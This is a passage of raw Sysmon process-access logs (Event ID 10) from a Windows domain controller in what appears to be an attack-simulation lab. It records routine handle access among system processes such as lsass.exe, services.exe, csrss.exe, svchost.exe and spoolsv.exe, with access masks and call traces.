07:53:23.852","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"948","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1169,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.852\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.852","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1170,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.858\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 920\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.858","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"920","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1171,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.863\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.863","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1172,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.863\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.863","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1173,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.869\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.869","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1174,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.869\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.869","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1175,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.869\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.869","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1176,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:23.869\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:23.869","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
